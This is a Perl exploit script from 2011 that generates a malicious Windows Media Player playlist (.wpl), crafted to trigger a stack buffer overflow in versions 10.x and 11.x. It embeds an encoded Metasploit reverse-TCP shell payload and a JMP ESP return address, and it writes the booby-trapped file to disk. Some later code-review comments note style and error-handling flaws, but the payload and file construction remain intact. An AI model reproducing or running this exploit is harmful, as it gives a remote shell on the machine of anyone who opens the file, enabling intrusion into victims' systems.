[D] PERL : Windows Media Player 10.x (.wpl) Stack Buffer Overflow [Z]

2011-02-26 17:35:05
Inviato da: kedans

#!/usr/bin/perl


###
# Title : Windows Media Player 10.x (.wpl) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Tested on : windows XP SP3 Français & Arabic
# Target : Windows Media Player 10.x & 11.x
###

# Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com

#START SYSTEM /root@MSdos/ :
# NOTE(review): the script has no 'use strict' / 'use warnings'; the
# undeclared globals and unchecked I/O further down are accepted silently.
# cmd.exe builtins (title / color / cls) run through the shell; the return
# value of system() is never checked, so these are purely cosmetic.
system("title KedAns-Dz");
system("color 1e");
system("cls");

print "\n\n".
" ||========================================||\n".
" || ||\n".
" || Windows Media Player 10.x (.wpl) ||\n".
" || Stack Buffer Overflow ||\n".
" || Created BY KedAns-Dz ||\n".
" || ked-h(at)hotmail(dot)com ||\n".
" || ||\n".
" ||========================================||\n\n\n";
sleep(2);
print "\n";
print " [!] Please Wait Loading...\n";
# Payload Parameter (http://www.metasploit.com)
# windows/shell_reverse_tcp - 739 bytes
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
# Opaque byte string: the script only concatenates it below and never
# decodes or verifies it against the description in the comment above.
my $payload =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; #_ End Payload _
# Parameter OverFlow =>
# pack 'V' = one 32-bit little-endian unsigned value (4 bytes).
my $ret = pack('V',0x040c04b0) ; # Jump to ESP - from wmdband.dll
# Package globals (assigned without 'my'): 333 bytes each of 'A', 'B', 'C'.
$A = "\x41" x 333 ;
$B = "\x42" x 333 ;
$C = "\x43" x 333 ;
# "KedAns" (6 bytes) repeated 500 times = 3000 bytes.
my $buffer = "\x4b\x65\x64\x41\x6e\x73" x 500;
# 333 + 1 + 333 + 1 + 333 = 1001 bytes; interpolated into the tid attribute below.
my $abc = $A."-".$B."-".$C ; # tid="{AAA...-BBB..-CCC...}" etc...
# 30 bytes of 0x90.
my $padding = "\x90" x 30;
# KedAns = [Payload_shell][RET:0x040c04b0][Padding][Buffer]
my $kedans = $payload.$ret.$padding.$buffer ; # 'SRC = ' << in here
# Parameter Evil File =>
# The hex literals below spell out a .wpl playlist (XML: <?wpl version="1.0"?>
# <smil><head>…</head><body><seq><media …/></seq></body></smil>). Because the
# strings are double-quoted, $kedans is interpolated into the media element's
# src='…' attribute and $abc into its tid="{…}" attribute.
my $wpl =
"\x3c\x3f\x77\x70\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
"\x2e\x30\x22\x3f\x3e\x0a\x3c\x73\x6d\x69\x6c\x3e\x0a\x20\x20\x20".
"\x20\x3c\x68\x65\x61\x64\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20".
"\x3c\x6d\x65\x74\x61\x20\x6e\x61\x6d\x65\x3d\x22\x47\x65\x6e\x65".
"\x72\x61\x74\x6f\x72\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x3d\x22".
"\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x20\x57\x69\x6e\x64\x6f\x77".
"\x73\x20\x4d\x65\x64\x69\x61\x20\x50\x6c\x61\x79\x65\x72\x20\x2d".
"\x2d\x20\x31\x31\x2e\x30\x2e\x35\x37\x32\x31\x2e\x35\x31\x34\x35".
"\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x6d\x65\x74".
"\x61\x20\x6e\x61\x6d\x65\x3d\x22\x41\x76\x65\x72\x61\x67\x65\x52".
"\x61\x74\x69\x6e\x67\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x3d\x22".
"\x37\x36\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x6d".
"\x65\x74\x61\x20\x6e\x61\x6d\x65\x3d\x22\x54\x6f\x74\x61\x6c\x44".
"\x75\x72\x61\x74\x69\x6f\x6e\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74".
"\x3d\x22\x33\x35\x31\x39\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20".
"\x20\x20\x3c\x6d\x65\x74\x61\x20\x6e\x61\x6d\x65\x3d\x22\x49\x74".
"\x65\x6d\x43\x6f\x75\x6e\x74\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74".
"\x3d\x22\x31\x37\x22\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20".
"\x3c\x74\x69\x74\x6c\x65\x3e\x4b\x65\x64\x41\x6e\x73\x3c\x2f\x74".
"\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x68\x65\x61\x64".
"\x3e\x0a\x20\x20\x20\x20\x3c\x62\x6f\x64\x79\x3e\x0a\x20\x20\x20".
"\x20\x20\x20\x20\x20\x3c\x73\x65\x71\x3e\x0a\x09\x09\x3c\x6d\x65".
"\x64\x69\x61\x20\x73\x72\x63\x3d\x27$kedans\x27\x20\x74\x69\x64\x3d".
"\x22\x7b$abc\x7d\x22\x2f\x3e\x0a\x20\x20\x20\x20".
"\x20\x20\x20\x20\x3c\x2f\x73\x65\x71\x3e\x0a\x20\x20\x20\x20\x3c".
"\x2f\x62\x6f\x64\x79\x3e\x0a\x3c\x2f\x73\x6d\x69\x6c\x3e\x0a";
# _ End Parameter File _
# >> Creating ...
# Two-argument open with a bareword handle and no error check: if the open
# fails the script keeps going and the print below writes to an unopened
# handle. '>>' is append mode, so re-running the script appends another
# copy of the playlist to an existing KedAns.wpl instead of replacing it.
open(FILE,'>>KedAns.wpl'); # Evil File (Windows.Play.List)
print FILE $wpl;
sleep (2);
# Success is reported before close(); neither print nor close is checked.
print "\n [+] Creat Evil File Succesfully ! \n";
close(FILE);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================
